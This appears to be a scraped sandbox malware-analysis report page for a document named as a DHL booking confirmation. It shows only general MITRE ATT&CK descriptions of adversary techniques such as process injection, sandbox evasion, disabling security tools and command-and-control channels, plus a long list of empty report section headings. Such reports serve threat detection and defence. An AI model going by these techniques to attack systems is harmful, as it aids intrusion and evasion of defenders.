Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre